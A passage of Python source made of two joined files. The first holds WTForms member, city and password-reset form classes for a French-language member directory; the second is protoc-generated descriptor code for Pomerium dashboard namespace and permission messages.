    def __iter__(self):
        # Reorder self._fields according to the subclass's `field_order`
        # before delegating to the normal ModelForm iteration.
        field_order = getattr(self, 'field_order', None)
        if field_order:
            temp_fields = []
            for name in field_order:
                if name == '*':
                    # Expand '*' into all fields not named in field_order...
                    for k, v in self._fields.items():
                        if k not in field_order:
                            temp_fields.append((k, v))
                    # ...then stop: any names listed *after* '*' are ignored,
                    # because this break leaves the outer loop entirely.
                    break
                else:
                    temp_fields.append((name, self._fields[name]))
            self._fields = OrderedDict(temp_fields)
        return super(BaseForm, self).__iter__()

    def can_edit(self, member, field):
        # Default policy: nothing is editable; subclasses override.
        return False
class CategoryForm(BaseForm):
    """Auto-generated form for ``Category`` rows (primary keys editable)."""

    class Meta:
        model = mappings.Category
        include_primary_keys = True
class MembershipForm(BaseForm):
    """Auto-generated form for ``Membership`` rows (primary keys editable)."""

    class Meta:
        model = mappings.Membership
        include_primary_keys = True
class CityForm(BaseForm):
    """Auto-generated form for ``City`` rows."""

    class Meta:
        model = mappings.City
class ChangePassword(BaseForm):
    """Password-reset form: hidden token/login plus the new password twice.

    The two password fields must match (``EqualTo('confirm')``); labels and
    the mismatch message are user-facing French text and must stay as-is.
    """

    # Hidden fields carrying the reset token and the account login.
    token = HiddenField('token')
    login = HiddenField('login')
    # NOTE(review): `Required` is the legacy WTForms alias of `DataRequired`
    # (same behaviour) — consider migrating when touching this form.
    password = PasswordField('Mot de passe',
                             [Required(), EqualTo('confirm',
                              message=u'Les mots de passe diffèrent')])
    confirm = PasswordField('Resaisir mot de passe')
class CityInput(Input):
    """Widget rendering a text-like ``<input type="city">`` element."""

    input_type = 'city'

    def __call__(self, field, **kwargs):
        """Render the field as an ``<input>`` tag.

        Caller-supplied *kwargs* win over the defaults; the field's current
        value is only computed when no explicit ``value`` was given.
        """
        attrs = dict(kwargs)
        attrs.setdefault('id', field.id)
        attrs.setdefault('type', self.input_type)
        if 'value' not in attrs:
            attrs['value'] = field._value()
        markup = '<input %s/>' % self.html_params(name=field.name, **attrs)
        return HTMLString(markup)
class CityField(TextField):
    """Free-text field that resolves "<label> (<zipcode>)" input to a City row.

    Rendered with :class:`CityInput`. On validation the raw string is parsed
    and, when a matching ``City`` exists, ``self.data`` is replaced by the
    mapped instance.
    """
    widget = CityInput()

    def validate(self, form, extra_validators=()):
        """Resolve the submitted text into a ``City``; False on failure.

        Non-string data (e.g. already a City instance) passes through
        unchanged.
        """
        # NOTE: `unicode` implies this module targets Python 2 — kept as-is.
        if isinstance(self.data, unicode):
            db = Session()
            city_data = self.data.split(u'(')
            if len(city_data) == 2:
                city = city_data[0].strip()
                # Strip surrounding whitespace and the trailing ')'.
                zipcode = city_data[1].strip()[:-1]
                city = db.query(City).filter(City.zipcode == zipcode,
                                             City.label == city).first()
                if city:
                    self.data = city
                    return True
            # Fix: user-facing message had a typo ("Unkown" -> "Unknown").
            self.errors = ['Unknown city']
            return False
        return True
class MemberForm(BaseForm):
    """Edit form for a ``Member`` row (password is handled separately).

    Field declaration order is significant to WTForms and is preserved.
    """

    class Meta:
        model = mappings.Member
        include_primary_keys = False
        exclude = ['password']

    category = QuerySelectField('category', query_factory=get_codes,
                                get_label='label')
    membership = QuerySelectField('membership', query_factory=get_membership,
                                  get_label='label')
    city = CityField('city')

    # Display order for BaseForm.__iter__; '*' expands to the rest.
    field_order = ('is_published', 'bio', 'email', 'phone', 'phone2',
                   'address', 'city', '*')
    # Fields a regular member may change on their own record.
    user_can_change = ['is_published', 'bio', 'email', 'phone', 'phone2',
                       'address', 'city']

    def can_edit(self, member, field):
        """Super-users edit anything; members edit only the whitelisted
        fields of their own record (matched by e-mail address)."""
        if member.is_super_user:
            return True
        owns_record = member.email == self.email.data
        return owns_record and field.name in self.user_can_change
|
# -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: namespaces.proto
"""Generated protocol buffer code."""
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from google.protobuf import timestamp_pb2 as google_dot_protobuf_dot_timestamp__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='namespaces.proto',
package='pomerium.dashboard',
syntax='proto3',
serialized_options=b'Z+github.com/pomerium/pomerium-console/pkg/pb',
create_key=_descriptor._internal_create_key,
serialized_pb=b'\n\x10namespaces.proto\x12\x12pomerium.dashboard\x1a\x1fgoogle/protobuf/timestamp.proto\"\xf4\x01\n\tNamespace\x12\n\n\x02id\x18\x01 \x01(\t\x12\x11\n\tparent_id\x18\x02 \x01(\t\x12.\n\ncreated_at\x18\x03 \x01(\x0b\x32\x1a.google.protobuf.Timestamp\x12/\n\x0bmodified_at\x18\x04 \x01(\x0b\x32\x1a.google.protobuf.Timestamp\x12.\n\ndeleted_at\x18\x05 \x01(\x0b\x32\x1a.google.protobuf.Timestamp\x12\x0c\n\x04name\x18\x06 \x01(\t\x12\x13\n\x0broute_count\x18\x07 \x01(\x03\x12\x14\n\x0cpolicy_count\x18\x08 \x01(\x03\"$\n\x16\x44\x65leteNamespaceRequest\x12\n\n\x02id\x18\x01 \x01(\t\"\x19\n\x17\x44\x65leteNamespaceResponse\"!\n\x13GetNamespaceRequest\x12\n\n\x02id\x18\x01 \x01(\t\"H\n\x14GetNamespaceResponse\x12\x30\n\tnamespace\x18\x01 \x01(\x0b\x32\x1d.pomerium.dashboard.Namespace\"\x17\n\x15ListNamespacesRequest\"K\n\x16ListNamespacesResponse\x12\x31\n\nnamespaces\x18\x01 \x03(\x0b\x32\x1d.pomerium.dashboard.Namespace\"G\n\x13SetNamespaceRequest\x12\x30\n\tnamespace\x18\x01 \x01(\x0b\x32\x1d.pomerium.dashboard.Namespace\"H\n\x14SetNamespaceResponse\x12\x30\n\tnamespace\x18\x01 \x01(\x0b\x32\x1d.pomerium.dashboard.Namespace\"\xe8\x01\n\x13NamespacePermission\x12\n\n\x02id\x18\x01 \x01(\t\x12.\n\ncreated_at\x18\x02 \x01(\x0b\x32\x1a.google.protobuf.Timestamp\x12/\n\x0bmodified_at\x18\x03 \x01(\x0b\x32\x1a.google.protobuf.Timestamp\x12\x14\n\x0cnamespace_id\x18\x04 \x01(\t\x12\x16\n\x0enamespace_name\x18\x08 \x01(\t\x12\x14\n\x0csubject_type\x18\x05 \x01(\t\x12\x12\n\nsubject_id\x18\x06 \x01(\t\x12\x0c\n\x04role\x18\x07 \x01(\t\"\x91\x01\n\x18NamespacePermissionGroup\x12\x10\n\x08group_id\x18\x01 \x01(\t\x12\x12\n\ngroup_name\x18\x02 \x01(\t\x12\x13\n\x0bgroup_email\x18\x03 \x01(\t\x12\x14\n\x0cnamespace_id\x18\x04 \x01(\t\x12\x16\n\x0enamespace_name\x18\x05 \x01(\t\x12\x0c\n\x04role\x18\x06 \x01(\t\"\xa0\x01\n\x17NamespacePermissionUser\x12\x0f\n\x07user_id\x18\x01 \x01(\t\x12\x11\n\tuser_name\x18\x02 \x01(\t\x12\x12\n\nuser_email\x18\x03 
\x01(\t\x12\x11\n\tgroup_ids\x18\x04 \x03(\t\x12\x14\n\x0cnamespace_id\x18\x05 \x01(\t\x12\x16\n\x0enamespace_name\x18\x07 \x01(\t\x12\x0c\n\x04role\x18\x06 \x01(\t\".\n DeleteNamespacePermissionRequest\x12\n\n\x02id\x18\x01 \x01(\t\"#\n!DeleteNamespacePermissionResponse\"+\n\x1dGetNamespacePermissionRequest\x12\n\n\x02id\x18\x01 \x01(\t\"g\n\x1eGetNamespacePermissionResponse\x12\x45\n\x14namespace_permission\x18\x01 \x01(\x0b\x32\'.pomerium.dashboard.NamespacePermission\"!\n\x1fListNamespacePermissionsRequest\"j\n ListNamespacePermissionsResponse\x12\x46\n\x15namespace_permissions\x18\x01 \x03(\x0b\x32\'.pomerium.dashboard.NamespacePermission\"<\n$ListNamespacePermissionGroupsRequest\x12\x14\n\x0cnamespace_id\x18\x01 \x01(\t\"e\n%ListNamespacePermissionGroupsResponse\x12<\n\x06groups\x18\x01 \x03(\x0b\x32,.pomerium.dashboard.NamespacePermissionGroup\";\n#ListNamespacePermissionUsersRequest\x12\x14\n\x0cnamespace_id\x18\x01 \x01(\t\"b\n$ListNamespacePermissionUsersResponse\x12:\n\x05users\x18\x01 \x03(\x0b\x32+.pomerium.dashboard.NamespacePermissionUser\"f\n\x1dSetNamespacePermissionRequest\x12\x45\n\x14namespace_permission\x18\x01 \x01(\x0b\x32\'.pomerium.dashboard.NamespacePermission\"g\n\x1eSetNamespacePermissionResponse\x12\x45\n\x14namespace_permission\x18\x01 
\x01(\x0b\x32\'.pomerium.dashboard.NamespacePermission2\xad\x03\n\x10NamespaceService\x12j\n\x0f\x44\x65leteNamespace\x12*.pomerium.dashboard.DeleteNamespaceRequest\x1a+.pomerium.dashboard.DeleteNamespaceResponse\x12\x61\n\x0cGetNamespace\x12\'.pomerium.dashboard.GetNamespaceRequest\x1a(.pomerium.dashboard.GetNamespaceResponse\x12g\n\x0eListNamespaces\x12).pomerium.dashboard.ListNamespacesRequest\x1a*.pomerium.dashboard.ListNamespacesResponse\x12\x61\n\x0cSetNamespace\x12\'.pomerium.dashboard.SetNamespaceRequest\x1a(.pomerium.dashboard.SetNamespaceResponse2\xdc\x06\n\x1aNamespacePermissionService\x12\x88\x01\n\x19\x44\x65leteNamespacePermission\x12\x34.pomerium.dashboard.DeleteNamespacePermissionRequest\x1a\x35.pomerium.dashboard.DeleteNamespacePermissionResponse\x12\x7f\n\x16GetNamespacePermission\x12\x31.pomerium.dashboard.GetNamespacePermissionRequest\x1a\x32.pomerium.dashboard.GetNamespacePermissionResponse\x12\x85\x01\n\x18ListNamespacePermissions\x12\x33.pomerium.dashboard.ListNamespacePermissionsRequest\x1a\x34.pomerium.dashboard.ListNamespacePermissionsResponse\x12\x94\x01\n\x1dListNamespacePermissionGroups\x12\x38.pomerium.dashboard.ListNamespacePermissionGroupsRequest\x1a\x39.pomerium.dashboard.ListNamespacePermissionGroupsResponse\x12\x91\x01\n\x1cListNamespacePermissionUsers\x12\x37.pomerium.dashboard.ListNamespacePermissionUsersRequest\x1a\x38.pomerium.dashboard.ListNamespacePermissionUsersResponse\x12\x7f\n\x16SetNamespacePermission\x12\x31.pomerium.dashboard.SetNamespacePermissionRequest\x1a\x32.pomerium.dashboard.SetNamespacePermissionResponseB-Z+github.com/pomerium/pomerium-console/pkg/pbb\x06proto3'
,
dependencies=[google_dot_protobuf_dot_timestamp__pb2.DESCRIPTOR,])
_NAMESPACE = _descriptor.Descriptor(
name='Namespace',
full_name='pomerium.dashboard.Namespace',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='id', full_name='pomerium.dashboard.Namespace.id', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='parent_id', full_name='pomerium.dashboard.Namespace.parent_id', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='created_at', full_name='pomerium.dashboard.Namespace.created_at', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='modified_at', full_name='pomerium.dashboard.Namespace.modified_at', index=3,
number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='deleted_at', full_name='pomerium.dashboard.Namespace.deleted_at', index=4,
number=5, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='name', full_name='pomerium.dashboard.Namespace.name', index=5,
number=6, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='route_count', full_name='pomerium.dashboard.Namespace.route_count', index=6,
number=7, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='policy_count', full_name='pomerium.dashboard.Namespace.policy_count', index=7,
number=8, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=74,
serialized_end=318,
)
_DELETENAMESPACEREQUEST = _descriptor.Descriptor(
name='DeleteNamespaceRequest',
full_name='pomerium.dashboard.DeleteNamespaceRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='id', full_name='pomerium.dashboard.DeleteNamespaceRequest.id', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=320,
serialized_end=356,
)
_DELETENAMESPACERESPONSE = _descriptor.Descriptor(
name='DeleteNamespaceResponse',
full_name='pomerium.dashboard.DeleteNamespaceResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=358,
serialized_end=383,
)
_GETNAMESPACEREQUEST = _descriptor.Descriptor(
name='GetNamespaceRequest',
full_name='pomerium.dashboard.GetNamespaceRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='id', full_name='pomerium.dashboard.GetNamespaceRequest.id', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=385,
serialized_end=418,
)
_GETNAMESPACERESPONSE = _descriptor.Descriptor(
name='GetNamespaceResponse',
full_name='pomerium.dashboard.GetNamespaceResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='namespace', full_name='pomerium.dashboard.GetNamespaceResponse.namespace', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=420,
serialized_end=492,
)
_LISTNAMESPACESREQUEST = _descriptor.Descriptor(
name='ListNamespacesRequest',
full_name='pomerium.dashboard.ListNamespacesRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=494,
serialized_end=517,
)
_LISTNAMESPACESRESPONSE = _descriptor.Descriptor(
name='ListNamespacesResponse',
full_name='pomerium.dashboard.ListNamespacesResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='namespaces', full_name='pomerium.dashboard.ListNamespacesResponse.namespaces', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=519,
serialized_end=594,
)
_SETNAMESPACEREQUEST = _descriptor.Descriptor(
name='SetNamespaceRequest',
full_name='pomerium.dashboard.SetNamespaceRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='namespace', full_name='pomerium.dashboard.SetNamespaceRequest.namespace', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=596,
serialized_end=667,
)
_SETNAMESPACERESPONSE = _descriptor.Descriptor(
name='SetNamespaceResponse',
full_name='pomerium.dashboard.SetNamespaceResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='namespace', full_name='pomerium.dashboard.SetNamespaceResponse.namespace', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=669,
serialized_end=741,
)
_NAMESPACEPERMISSION = _descriptor.Descriptor(
name='NamespacePermission',
full_name='pomerium.dashboard.NamespacePermission',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='id', full_name='pomerium.dashboard.NamespacePermission.id', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='created_at', full_name='pomerium.dashboard.NamespacePermission.created_at', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='modified_at', full_name='pomerium.dashboard.NamespacePermission.modified_at', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='namespace_id', full_name='pomerium.dashboard.NamespacePermission.namespace_id', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='namespace_name', full_name='pomerium.dashboard.NamespacePermission.namespace_name', index=4,
number=8, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='subject_type', full_name='pomerium.dashboard.NamespacePermission.subject_type', index=5,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='subject_id', full_name='pomerium.dashboard.NamespacePermission.subject_id', index=6,
number=6, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='role', full_name='pomerium.dashboard.NamespacePermission.role', index=7,
number=7, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=744,
serialized_end=976,
)
_NAMESPACEPERMISSIONGROUP = _descriptor.Descriptor(
name='NamespacePermissionGroup',
full_name='pomerium.dashboard.NamespacePermissionGroup',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='group_id', full_name='pomerium.dashboard.NamespacePermissionGroup.group_id', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='group_name', full_name='pomerium.dashboard.NamespacePermissionGroup.group_name', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='group_email', full_name='pomerium.dashboard.NamespacePermissionGroup.group_email', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='namespace_id', full_name='pomerium.dashboard.NamespacePermissionGroup.namespace_id', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='namespace_name', full_name='pomerium.dashboard.NamespacePermissionGroup.namespace_name', index=4,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='role', full_name='pomerium.dashboard.NamespacePermissionGroup.role', index=5,
number=6, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=979,
serialized_end=1124,
)
_NAMESPACEPERMISSIONUSER = _descriptor.Descriptor(
name='NamespacePermissionUser',
full_name='pomerium.dashboard.NamespacePermissionUser',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='user_id', full_name='pomerium.dashboard.NamespacePermissionUser.user_id', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='user_name', full_name='pomerium.dashboard.NamespacePermissionUser.user_name', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='user_email', full_name='pomerium.dashboard.NamespacePermissionUser.user_email', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='group_ids', full_name='pomerium.dashboard.NamespacePermissionUser.group_ids', index=3,
number=4, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='namespace_id', full_name='pomerium.dashboard.NamespacePermissionUser.namespace_id', index=4,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='namespace_name', full_name='pomerium.dashboard.NamespacePermissionUser.namespace_name', index=5,
number=7, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='role', full_name='pomerium.dashboard.NamespacePermissionUser.role', index=6,
number=6, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1127,
serialized_end=1287,
)
_DELETENAMESPACEPERMISSIONREQUEST = _descriptor.Descriptor(
name='DeleteNamespacePermissionRequest',
full_name='pomerium.dashboard.DeleteNamespacePermissionRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='id', full_name='pomerium.dashboard.DeleteNamespacePermissionRequest.id', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1289,
serialized_end=1335,
)
_DELETENAMESPACEPERMISSIONRESPONSE = _descriptor.Descriptor(
name='DeleteNamespacePermissionResponse',
full_name='pomerium.dashboard.DeleteNamespacePermissionResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1337,
serialized_end=1372,
)
_GETNAMESPACEPERMISSIONREQUEST = _descriptor.Descriptor(
name='GetNamespacePermissionRequest',
full_name='pomerium.dashboard.GetNamespacePermissionRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='id', full_name='pomerium.dashboard.GetNamespacePermissionRequest.id', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1374,
serialized_end=1417,
)
_GETNAMESPACEPERMISSIONRESPONSE = _descriptor.Descriptor(
name='GetNamespacePermissionResponse',
